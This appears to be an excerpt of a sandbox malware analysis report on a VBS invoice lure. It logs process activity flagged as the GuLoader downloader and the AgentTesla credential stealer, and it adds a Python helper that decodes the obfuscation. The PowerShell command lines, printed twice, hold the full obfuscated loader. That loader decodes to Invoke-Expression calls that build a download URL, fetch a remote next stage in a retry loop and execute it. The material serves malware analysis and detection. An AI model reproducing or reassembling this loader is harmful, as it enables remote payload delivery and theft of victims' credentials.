                                                                      2024-04-18 08:11:45 UTC1255INData Raw: 6d f7 4b 2f f6 81 db 65 d5 c5 91 7a 35 5e bd 26 90 30 f9 1f 82 72 30 8c 95 40 9f 84 a2 9f 63 6f 27 69 3f 46 51 6b c0 15 1e 7e 16 22 21 a5 4a 41 23 1b 5a 0f dc 3c 7c 24 7c fe 65 04 e8 80 2c 6e 4c 05 41 f4 ec 80 b3 fe 1e ba 89 8f fe 58 66 05 8f 6d 14 6c cb cf 3e 5e b5 c2 ab 2d 18 c1 b9 c9 18 3e ce 1c e1 8e fa ab 3d 48 94 a6 90 cc 5a 37 41 97 42 4d 82 5d 92 9d b4 45 78 43 bf 00 fd ab 85 68 e3 28 6d c1 bb 04 3f b9 05 66 59 31 8d 16 fb db 11 32 ff aa 43 8c 4f 0f 23 52 60 0f 11 2b 7e 21 a0 17 cb 46 c4 55 e8 97 1e 54 b7 e9 a9 0c de 87 17 c2 df f6 05 2a bf a4 ce e4 59 67 a4 8f bb 32 27 e7 d2 89 be 50 67 9e f1 4e 9a 39 eb 7a 5b 73 d9 aa 67 3e e1 9a 1f 1b 6e 9a 22 9a 57 37 f7 29 05 d6 3b 8c e2 c8 ac 1d 95 00 9b 2c 2b f1 ed 77 2e 4d ea de c9 64 2f 6a 95 b3 b9 bc 94
                                                                      Data Ascii: mK/ez5^&0r0@co'i?FQk~"!JA#Z<|$|e,nLAXfml>^->=HZ7ABM]ExCh(m?fY12CO#R`+~!FUT*Yg2'PgN9z[sg>n"W7);,+w.Md/j

                                                                      Target ID:0
                                                                      Start time:10:10:53
                                                                      Start date:18/04/2024
                                                                      Path:C:\Windows\System32\wscript.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Factura2.vbs"
                                                                      Imagebase:0x7ff7899b0000
                                                                      File size:170'496 bytes
                                                                      MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:2
                                                                      Start time:10:10:54
                                                                      Start date:18/04/2024
                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Enchodontoid = 1;$Multinervate='Substrin';$Multinervate+='g';Function Pisseskn($Parate){$Nongelatinizing=$Parate.Length-$Enchodontoid;For($Agrestical=5; $Agrestical -lt $Nongelatinizing; $Agrestical+=(6)){$Dextranase88+=$Parate.$Multinervate.Invoke($Agrestical, $Enchodontoid);}$Dextranase88;}function Saprophagan($Factories){. ($Laurikke) ($Factories);}$Hovedvrker=Pisseskn 'addleMS,steo .andzConfoi Vejrl ReavlPrintaB.une/Ca,ro5.icit.Choos0Skide Lnnin(DuellW desiiMonopnWap.kdSavanoIslanwdoercs Emer BromNUoverTAxopo Opri.1Allia0Forel.Vaing0 comb;Angre DecorWGraeni Femin G.in6Kursu4Ect,c;ko tr Parenxtyede6Tri,h4taffe;Phary Elle,r,uresv Kipe:,eseg1Hjemm2Hjlpe1klogt. igne0Prd k) Hove AlterGDis aeJonnhcStrafkF,rudoPseud/ St,w2R vhu0Digi.1,ecir0Fersk0nakke1K.ass0 Mese1 ield OsphrFKlon.iFemaarKlebieBrontf S.tyoAmtsrxBorte/ Fron1Excla2Butto1 Publ.Svesk0Handl ';$Nuanceret=Pisseskn ' SdelURepansMedhoeHe.lirPar a-El,vaAUkasegPoca,eMagtkn divvtIodat ';$unshady=Pisseskn 'Xylo.h RabbtHalfhtmika,pt,lles Ayyu: Un,o/ Inka/D.kkedBo edrDicari BeravPl,caeCo.pa.Dem bg HusnoVelbeoBann,gAnno,lTandsedegne. 
Swinc Fel,oRebanmDemou/EndkkuDieumcAd oc?Dag oeS,rtlx sadapBhaktonond r UdtrtG imr=TobacdDefraocl.ngwVkke nWeakalFulfioPlatoaFo.stdStorb&KlbesiPessudBatte=Stv r1OneraTSpermE,elveIMesmen re.tJSkoleuFidg.NStopne ,rstahimmeiAbiol- TaleSContrRBes.iIBarbo4 UndeC emibSuppl4Freed0 DagdUTartr9Aeropk.elefrUdsy,lExecu2TraveXCoemp7AntirxHypoej MbelD,imelg reenG.orsc ';$Dousers=Pisseskn 'T llb>Reimm ';$Laurikke=Pisseskn 'AfpluigrligeDemorxLuckf ';$Flyvestolene = Pisseskn ' UnwoeKil.bcvibrihOpsplo.ibbe mic,o%daiquaHeroepGoldepUd,krdSteelatum.dtOustia A,ch%Brsli\ PorcM ShifeSinopr TykeoMythogSkorsaSkat sGastrt TrihrIntrau Pu.sl.iuntaCentr.DigamB autoeGrammsHouse Pid.l&Grumo&Und p Delfe Sst.cp,rtuhPigmeoFrt s Toppl$Objec ';Saprophagan (Pisseskn ' Punk$ Di ogSa valSlagbo S bubUnscaa fluelMisl.:OmbytAL.mbasQuee sIdioteUlempv JoureTimbrrNaadia.usiktNong.iOrgannIndbrg onti=U,ear(F attcVelsemStevedNe hu Eks m/OmskrcLetfr ota$ VentFKern.lSciopy .igtv ReleeS,less Snakt TradoU.bell FireecoelonTot.ee malt)Afspn ');Saprophagan (Pisseskn 'junke$ nsig AppalunderoepipabIsraea Lit.lpresu:ParitFGavend SyfirGra.ue vendnNonpreResidh ChanjHardme Bedrm Stil= Chil$ armu SponnPa.klsBagflh.edbia epowdBe,tsy.icla.Daa,esNringpUnexplOperci scat.ornb( drud$ ApolDGiftioObjekuDenatsT,efoePhr.tr UnoxsIndkr)Vel.o ');$unshady=$Fdrenehjem[0];Saprophagan (Pisseskn 'Nupti$De,meg .krol TakkoAl.opb Spe.aGelatlvarpn:SprreBunfelaEfteraSkoledPetrorunderuUndlitWor heSkakbnMicro=cilioN TraceNonf,wU hen-TradiO SalibInscrjA tikeU insc HeadtResta .gtesSBlo,kyUdlndsNonsutFjor.e.aukam Radi.,ysteNIlluveKupeettinkr.StatiWHjlpeeSnarebP.radCUr allHangoiHexace,phemn C litPensi ');Saprophagan (Pisseskn 'philo$triumB Bun a Unp.aSubagdFo,kerDah iu.ridntSengeeSkruenSched. 
B.rgHAnchye DuraarangsdPrivaelogfirGa,lesTaga,[.etox$SlentNEct suGenfraAph onRelincKroniemorthrPrecieLandstBjrne]Neohi=Can e$MelloHFolkeoMeddevSaleaeSjalsdA.allvS awnrOutbukVexateAseptr.toma ');$Smoky=Pisseskn ' SubsBAud oaU,tegaLnt,ld otharBegynuKlanttB.azaeQuintnBinde. Ha dD,ejevoLumbaw,eksin Fe ilplejeo.orniaDecimdtragiFfortriHeadllThermeMeta (Under$Opsl,uCordanHummis,racuhpseu,aUdslidIongiy,ogtr,Chair$,aadvSGrievt Sn.ea,ensirPhytot ,undh AtomuR,evelPyra.l MoraeMorphrSuffr)Humif ';$Smoky=$Asseverating[1]+$Smoky;$Starthuller=$Asseverating[0];Saprophagan (Pisseskn ' Indi$ Nonmg aflalNoninoFlashb nfaaE.dotlTro,d:Inte.s Datap IndorLogicoVandbg infifStudioHarqurKendisA amok,olysePavelrDaasenskepte,nnivs odse= apni(NumerTDebone FinnsOt ertConci-H,emgPGinetaStedstAffalh .run ritar$UnmanSreva.tBrohoaOverfr,hospt Pe.ahPatroutilgalUdl,sl PeneeHairerTrste) Netv ');while (!$sprogforskernes) {Saprophagan (Pisseskn ',ivaa$RegurgFolk,l sonioSprigbElastaBrotolvalla:StaphSBr,ehu.eulob,ireetmotoro anct Br.vaKurmalRe.frlIngvai bag n CogigUnd r=Skram$TeksttR,alirPlatouSil ne Hnde ') ;Saprophagan $Smoky;Saprophagan (Pisseskn 'HubbaSResultTr quaMorskrAppaytAbrup-Pra,sS.jeldlFeasieElleveKoghepRund, Ungdo4P.irr ');Saprophagan (Pisseskn 'Super$Suggeg Ungel Pr fo psitbVandraInterlPol,f:Randss KajupflerbrSaldeoMycelgslingfRaakooG,ardr I,ess Tullkv ktoePat,orS ertnCytoleHypoasMilko= Forb(CraneTKe soeToluqsFrstetYet p-dek aPbortsaModsttDyvouhUnbu. 
Whats$ Hu kS ArchtGyar aZiontrActintsemmih urblu.omprl Bry.lTuyereHavburAlwin)Byste ') ;Saprophagan (Pisseskn 'Unobe$DinargRaglalTriceoJunc,b Rutiajustil Gnat: SyndZ ov roBushbcPropiaBon ml PartoBagfl=Nonp $Id.algBly alWeedeoDimitb Pre,aSporrlcos.a:DecimKJsandoBorgerChemot For l AfrigPisannLifoiiP skenMus.tg DiskePanterPo,yd+Con.u+Legi.%Behng$ CacoF hamad Sworr Fal,eSvumnn Bh.leGratuhBoligjV.inyewic,omBrand.,etincAsymmo .estu Pa lnExtentpropa ') ;$unshady=$Fdrenehjem[$Zocalo];}Saprophagan (Pisseskn 'Bolig$KjesegProevlGa,blo B.rdbPauseaStudilKenni:BramsLRegule adedn Clare.edrat Kugl Nymaa=Su.pr In,oGSpecteMela,t Ammi-AnskaCacumeoKrigsnJingstPref,ePyobanKonfetExha, Tids$ GaviSBl wttAkadea BranrKolpotBillehsk teu Per,l UntulAl,oceWa err dgif ');Saprophagan (Pisseskn 'Syr.b$sideogPondwlAposeoP,rspbUnex aSiro,lBacil:EbraiURea.tn Coa,iHelseogebyrn CirciP.seksBlasetReereeOrdner RejssAt ac Slags=Repat Borge[hoptoS Wroky rgumsParentGavekeMo.abmFlje..Pr.acC PerioremsenSurf.v BereeUgr,irBlaartPreop]Imbo : Sidd:UnemoFF,scir bil oParacmUns.oBBa,veaSchepsPalmaeAccul6Nejsi4HabilS ,teatPa ser.ntibiAn.lenScantgTutti(Lejeo$afskiLPseudeUnstanForsve roostEngsn)Elekt ');Saprophagan (Pisseskn 'Und.k$re.segtyreslH ratome iabKondeaU brilBumme:Jvn.rSGavebc S.tao amicffiordf Sings judg Ikra=Fan,a Ko po[OutrhS Nondy Posts OccitvinedeReloamHul.i.Fl,niTAquate,arnexAfprvtCafe..Gge.uESkibinA,armcD moroInropdDecori DrninSlinggHniss] Unus: marg:SoignAKrligSF.rsiCs.nspIProduIo.ymp.BrislGB,rgoeEl.stt intrSGar,etCypr.rInactiGen,anStdergForma(Immun$Oed,pUSkinbn,ptagiCohaboDemianTalleichorisAn ist SliceSkomar Pa,tsRe.im) Xant ');Saprophagan (Pisseskn 'Alter$Bacchg Hdrel SpecoAntirb CowpaGimmilLeuco:talleSfejlmuBrandp.ooeyePro orT leviKei.un bebocp ykiuSubcomFortibStikoeUly,knJapactIndre1 Muni6Bryg,3Lejek=Retss$,hiroSu.wagcRefleo EndofO,ercfLootisTeate.IndlusPa tauKredibVaca sFr igtfrkherTweeziAuditn RiflgRetal( He m3 Sy,t1Spik.5 Poly0flout7Cho.d3Nephr,Lidel2uncom7 Ko.p4Proje3Lycop0se.eh)spout 
');Saprophagan $Superincumbent163;"
                                                                      Imagebase:0x7ff6e3d50000
                                                                      File size:452'608 bytes
                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000002.00000002.2895451341.00000243B8200000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:3
                                                                      Start time:10:10:54
                                                                      Start date:18/04/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff66e660000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:4
                                                                      Start time:10:10:56
                                                                      Start date:18/04/2024
                                                                      Path:C:\Windows\System32\cmd.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Merogastrula.Bes && echo $"
                                                                      Imagebase:0x7ff6cb040000
                                                                      File size:289'792 bytes
                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:5
                                                                      Start time:10:11:03
                                                                      Start date:18/04/2024
                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Enchodontoid = 1;$Multinervate='Substrin';$Multinervate+='g';Function Pisseskn($Parate){$Nongelatinizing=$Parate.Length-$Enchodontoid;For($Agrestical=5; $Agrestical -lt $Nongelatinizing; $Agrestical+=(6)){$Dextranase88+=$Parate.$Multinervate.Invoke($Agrestical, $Enchodontoid);}$Dextranase88;}function Saprophagan($Factories){. ($Laurikke) ($Factories);}$Hovedvrker=Pisseskn 'addleMS,steo .andzConfoi Vejrl ReavlPrintaB.une/Ca,ro5.icit.Choos0Skide Lnnin(DuellW desiiMonopnWap.kdSavanoIslanwdoercs Emer BromNUoverTAxopo Opri.1Allia0Forel.Vaing0 comb;Angre DecorWGraeni Femin G.in6Kursu4Ect,c;ko tr Parenxtyede6Tri,h4taffe;Phary Elle,r,uresv Kipe:,eseg1Hjemm2Hjlpe1klogt. igne0Prd k) Hove AlterGDis aeJonnhcStrafkF,rudoPseud/ St,w2R vhu0Digi.1,ecir0Fersk0nakke1K.ass0 Mese1 ield OsphrFKlon.iFemaarKlebieBrontf S.tyoAmtsrxBorte/ Fron1Excla2Butto1 Publ.Svesk0Handl ';$Nuanceret=Pisseskn ' SdelURepansMedhoeHe.lirPar a-El,vaAUkasegPoca,eMagtkn divvtIodat ';$unshady=Pisseskn 'Xylo.h RabbtHalfhtmika,pt,lles Ayyu: Un,o/ Inka/D.kkedBo edrDicari BeravPl,caeCo.pa.Dem bg HusnoVelbeoBann,gAnno,lTandsedegne. 
Swinc Fel,oRebanmDemou/EndkkuDieumcAd oc?Dag oeS,rtlx sadapBhaktonond r UdtrtG imr=TobacdDefraocl.ngwVkke nWeakalFulfioPlatoaFo.stdStorb&KlbesiPessudBatte=Stv r1OneraTSpermE,elveIMesmen re.tJSkoleuFidg.NStopne ,rstahimmeiAbiol- TaleSContrRBes.iIBarbo4 UndeC emibSuppl4Freed0 DagdUTartr9Aeropk.elefrUdsy,lExecu2TraveXCoemp7AntirxHypoej MbelD,imelg reenG.orsc ';$Dousers=Pisseskn 'T llb>Reimm ';$Laurikke=Pisseskn 'AfpluigrligeDemorxLuckf ';$Flyvestolene = Pisseskn ' UnwoeKil.bcvibrihOpsplo.ibbe mic,o%daiquaHeroepGoldepUd,krdSteelatum.dtOustia A,ch%Brsli\ PorcM ShifeSinopr TykeoMythogSkorsaSkat sGastrt TrihrIntrau Pu.sl.iuntaCentr.DigamB autoeGrammsHouse Pid.l&Grumo&Und p Delfe Sst.cp,rtuhPigmeoFrt s Toppl$Objec ';Saprophagan (Pisseskn ' Punk$ Di ogSa valSlagbo S bubUnscaa fluelMisl.:OmbytAL.mbasQuee sIdioteUlempv JoureTimbrrNaadia.usiktNong.iOrgannIndbrg onti=U,ear(F attcVelsemStevedNe hu Eks m/OmskrcLetfr ota$ VentFKern.lSciopy .igtv ReleeS,less Snakt TradoU.bell FireecoelonTot.ee malt)Afspn ');Saprophagan (Pisseskn 'junke$ nsig AppalunderoepipabIsraea Lit.lpresu:ParitFGavend SyfirGra.ue vendnNonpreResidh ChanjHardme Bedrm Stil= Chil$ armu SponnPa.klsBagflh.edbia epowdBe,tsy.icla.Daa,esNringpUnexplOperci scat.ornb( drud$ ApolDGiftioObjekuDenatsT,efoePhr.tr UnoxsIndkr)Vel.o ');$unshady=$Fdrenehjem[0];Saprophagan (Pisseskn 'Nupti$De,meg .krol TakkoAl.opb Spe.aGelatlvarpn:SprreBunfelaEfteraSkoledPetrorunderuUndlitWor heSkakbnMicro=cilioN TraceNonf,wU hen-TradiO SalibInscrjA tikeU insc HeadtResta .gtesSBlo,kyUdlndsNonsutFjor.e.aukam Radi.,ysteNIlluveKupeettinkr.StatiWHjlpeeSnarebP.radCUr allHangoiHexace,phemn C litPensi ');Saprophagan (Pisseskn 'philo$triumB Bun a Unp.aSubagdFo,kerDah iu.ridntSengeeSkruenSched. 
B.rgHAnchye DuraarangsdPrivaelogfirGa,lesTaga,[.etox$SlentNEct suGenfraAph onRelincKroniemorthrPrecieLandstBjrne]Neohi=Can e$MelloHFolkeoMeddevSaleaeSjalsdA.allvS awnrOutbukVexateAseptr.toma ');$Smoky=Pisseskn ' SubsBAud oaU,tegaLnt,ld otharBegynuKlanttB.azaeQuintnBinde. Ha dD,ejevoLumbaw,eksin Fe ilplejeo.orniaDecimdtragiFfortriHeadllThermeMeta (Under$Opsl,uCordanHummis,racuhpseu,aUdslidIongiy,ogtr,Chair$,aadvSGrievt Sn.ea,ensirPhytot ,undh AtomuR,evelPyra.l MoraeMorphrSuffr)Humif ';$Smoky=$Asseverating[1]+$Smoky;$Starthuller=$Asseverating[0];Saprophagan (Pisseskn ' Indi$ Nonmg aflalNoninoFlashb nfaaE.dotlTro,d:Inte.s Datap IndorLogicoVandbg infifStudioHarqurKendisA amok,olysePavelrDaasenskepte,nnivs odse= apni(NumerTDebone FinnsOt ertConci-H,emgPGinetaStedstAffalh .run ritar$UnmanSreva.tBrohoaOverfr,hospt Pe.ahPatroutilgalUdl,sl PeneeHairerTrste) Netv ');while (!$sprogforskernes) {Saprophagan (Pisseskn ',ivaa$RegurgFolk,l sonioSprigbElastaBrotolvalla:StaphSBr,ehu.eulob,ireetmotoro anct Br.vaKurmalRe.frlIngvai bag n CogigUnd r=Skram$TeksttR,alirPlatouSil ne Hnde ') ;Saprophagan $Smoky;Saprophagan (Pisseskn 'HubbaSResultTr quaMorskrAppaytAbrup-Pra,sS.jeldlFeasieElleveKoghepRund, Ungdo4P.irr ');Saprophagan (Pisseskn 'Super$Suggeg Ungel Pr fo psitbVandraInterlPol,f:Randss KajupflerbrSaldeoMycelgslingfRaakooG,ardr I,ess Tullkv ktoePat,orS ertnCytoleHypoasMilko= Forb(CraneTKe soeToluqsFrstetYet p-dek aPbortsaModsttDyvouhUnbu. 
Whats$ Hu kS ArchtGyar aZiontrActintsemmih urblu.omprl Bry.lTuyereHavburAlwin)Byste ') ;Saprophagan (Pisseskn 'Unobe$DinargRaglalTriceoJunc,b Rutiajustil Gnat: SyndZ ov roBushbcPropiaBon ml PartoBagfl=Nonp $Id.algBly alWeedeoDimitb Pre,aSporrlcos.a:DecimKJsandoBorgerChemot For l AfrigPisannLifoiiP skenMus.tg DiskePanterPo,yd+Con.u+Legi.%Behng$ CacoF hamad Sworr Fal,eSvumnn Bh.leGratuhBoligjV.inyewic,omBrand.,etincAsymmo .estu Pa lnExtentpropa ') ;$unshady=$Fdrenehjem[$Zocalo];}Saprophagan (Pisseskn 'Bolig$KjesegProevlGa,blo B.rdbPauseaStudilKenni:BramsLRegule adedn Clare.edrat Kugl Nymaa=Su.pr In,oGSpecteMela,t Ammi-AnskaCacumeoKrigsnJingstPref,ePyobanKonfetExha, Tids$ GaviSBl wttAkadea BranrKolpotBillehsk teu Per,l UntulAl,oceWa err dgif ');Saprophagan (Pisseskn 'Syr.b$sideogPondwlAposeoP,rspbUnex aSiro,lBacil:EbraiURea.tn Coa,iHelseogebyrn CirciP.seksBlasetReereeOrdner RejssAt ac Slags=Repat Borge[hoptoS Wroky rgumsParentGavekeMo.abmFlje..Pr.acC PerioremsenSurf.v BereeUgr,irBlaartPreop]Imbo : Sidd:UnemoFF,scir bil oParacmUns.oBBa,veaSchepsPalmaeAccul6Nejsi4HabilS ,teatPa ser.ntibiAn.lenScantgTutti(Lejeo$afskiLPseudeUnstanForsve roostEngsn)Elekt ');Saprophagan (Pisseskn 'Und.k$re.segtyreslH ratome iabKondeaU brilBumme:Jvn.rSGavebc S.tao amicffiordf Sings judg Ikra=Fan,a Ko po[OutrhS Nondy Posts OccitvinedeReloamHul.i.Fl,niTAquate,arnexAfprvtCafe..Gge.uESkibinA,armcD moroInropdDecori DrninSlinggHniss] Unus: marg:SoignAKrligSF.rsiCs.nspIProduIo.ymp.BrislGB,rgoeEl.stt intrSGar,etCypr.rInactiGen,anStdergForma(Immun$Oed,pUSkinbn,ptagiCohaboDemianTalleichorisAn ist SliceSkomar Pa,tsRe.im) Xant ');Saprophagan (Pisseskn 'Alter$Bacchg Hdrel SpecoAntirb CowpaGimmilLeuco:talleSfejlmuBrandp.ooeyePro orT leviKei.un bebocp ykiuSubcomFortibStikoeUly,knJapactIndre1 Muni6Bryg,3Lejek=Retss$,hiroSu.wagcRefleo EndofO,ercfLootisTeate.IndlusPa tauKredibVaca sFr igtfrkherTweeziAuditn RiflgRetal( He m3 Sy,t1Spik.5 Poly0flout7Cho.d3Nephr,Lidel2uncom7 Ko.p4Proje3Lycop0se.eh)spout 
');Saprophagan $Superincumbent163;"
                                                                      Imagebase:0x250000
                                                                      File size:433'152 bytes
                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.2591546419.00000000062C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.2603130560.0000000008EA0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000002.2603283847.000000000CA31000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:high
                                                                      Has exited:true
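
The command line of Target ID 2 and Target ID 5 is the same script: it defines `Pisseskn`, a function that walks a string from index 5 in steps of 6 and keeps one character each time (every payload character is preceded by five Danish decoy letters, and the final character of each literal is never read), and `Saprophagan`, which dot-invokes `$Laurikke` on its argument. `$Laurikke` decodes to `iex`, so every `Saprophagan (Pisseskn '...')` call is an Invoke-Expression of a decoded fragment. The block below is an added example written for this page, not code from the report or from the malware: a Python mirror of `Pisseskn` plus helpers that pull the `Pisseskn '...'` literals out of a command line and decode them. The sample command line is constructed from the decoder definition and three literals copied from the report; `$Nuanceret` decodes to `User-Agent`, `$Dousers` to `>`, `$Laurikke` to `iex`. One caveat for anyone decoding straight from this page: the rendered command line dropped the non-ASCII letters of some decoy words, so a literal that contained one is a character short and its tail decodes shifted; literals without such letters (those used here) decode exactly.

```python
import re

# Added example (written for this page, not code from the report or the
# malware): a Python mirror of the Pisseskn decoder defined at the top of
# the PowerShell command line, and helpers that pull the Pisseskn '...'
# literals out of a command line and decode them.

def pisseskn(parate):
    """Mirror of the PowerShell function in the command line:
         $n = $Parate.Length - 1
         for ($i = 5; $i -lt $n; $i += 6) { $out += $Parate.Substring($i, 1) }
    One payload character follows every five decoy characters; the last
    character of the literal is padding and is never read."""
    return "".join(parate[i] for i in range(5, len(parate) - 1, 6))

LITERAL = re.compile(r"Pisseskn\s+'([^']*)'")
ASSIGNMENT = re.compile(r"(\$\w+)\s*=\s*Pisseskn\s+'([^']*)'")

def decode_literals(cmdline):
    """Decode every Pisseskn '...' literal, in order of appearance."""
    return [pisseskn(m.group(1)) for m in LITERAL.finditer(cmdline)]

def decode_assignments(cmdline):
    """Map each variable assigned directly from a Pisseskn call to its
    decoded value, so later Saprophagan (Pisseskn '...') calls can be read."""
    return {m.group(1): pisseskn(m.group(2)) for m in ASSIGNMENT.finditer(cmdline)}

# Constructed sample: the decoder definition and three literals copied from
# the report's command line (Target ID 2 / 5), without the rest of the script.
SAMPLE_CMDLINE = (
    "$Enchodontoid = 1;$Multinervate='Substrin';$Multinervate+='g';"
    "Function Pisseskn($Parate){$Nongelatinizing=$Parate.Length-$Enchodontoid;"
    "For($Agrestical=5; $Agrestical -lt $Nongelatinizing; $Agrestical+=(6))"
    "{$Dextranase88+=$Parate.$Multinervate.Invoke($Agrestical, $Enchodontoid);}"
    "$Dextranase88;}function Saprophagan($Factories){. ($Laurikke) ($Factories);}"
    "$Nuanceret=Pisseskn ' SdelURepansMedhoeHe.lirPar a-El,vaAUkasegPoca,eMagtkn divvtIodat ';"
    "$Dousers=Pisseskn 'T llb>Reimm ';"
    "$Laurikke=Pisseskn 'AfpluigrligeDemorxLuckf ';"
)

# Leading fragment of the report's $unshady literal (the part before the
# line break in the rendered command line); it decodes to the start of the
# download URL.  The rest of that literal lost non-ASCII decoy letters in
# extraction and no longer decodes cleanly, so it is not included.
URL_PREFIX_LITERAL = ("Xylo.h RabbtHalfhtmika,pt,lles Ayyu: Un,o/ Inka/D.kked"
                      "Bo edrDicari BeravPl,caeCo.pa.Dem bg HusnoVelbeoBann,g"
                      "Anno,lTandsedegne. ")

if __name__ == "__main__":
    for name, value in decode_assignments(SAMPLE_CMDLINE).items():
        print(f"{name:12} -> {value!r}")
    print("URL prefix    ->", pisseskn(URL_PREFIX_LITERAL))
```

Feeding the full command line to `decode_literals` turns the script into readable PowerShell one fragment at a time; the fragments build the download URL, set the User-Agent, fetch the next stage with a retry loop, and hand the result to `$Superincumbent163`, which the last `Saprophagan` call executes.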

                                                                      Target ID:6
                                                                      Start time:10:11:04
                                                                      Start date:18/04/2024
                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Merogastrula.Bes && echo $"
                                                                      Imagebase:0x1c0000
                                                                      File size:236'544 bytes
                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:10
                                                                      Start time:10:11:30
                                                                      Start date:18/04/2024
                                                                      Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                                                      Imagebase:0xad0000
                                                                      File size:516'608 bytes
                                                                      MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.3362357592.00000000245A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.3362357592.0000000024551000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.3362357592.0000000024551000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000A.00000002.3346276290.0000000007441000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:moderate
                                                                      Has exited:false

                                                                      Target ID:12
                                                                      Start time:10:11:58
                                                                      Start date:18/04/2024
                                                                      Path:C:\Users\user\AppData\Roaming\newfile\newfile.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\AppData\Roaming\newfile\newfile.exe"
                                                                      Imagebase:0x380000
                                                                      File size:516'608 bytes
                                                                      MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Antivirus matches:
                                                                      • Detection: 0%, ReversingLabs
                                                                      • Detection: 0%, Virustotal, Browse
                                                                      Reputation:moderate
                                                                      Has exited:true

                                                                      Target ID:13
                                                                      Start time:10:11:58
                                                                      Start date:18/04/2024
                                                                      Path:C:\Windows\System32\rundll32.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                      Imagebase:0x7ff63f8a0000
                                                                      File size:71'680 bytes
                                                                      MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:14
                                                                      Start time:10:12:06
                                                                      Start date:18/04/2024
                                                                      Path:C:\Users\user\AppData\Roaming\newfile\newfile.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\AppData\Roaming\newfile\newfile.exe"
                                                                      Imagebase:0x380000
                                                                      File size:516'608 bytes
                                                                      MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:moderate
                                                                      Has exited:true
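
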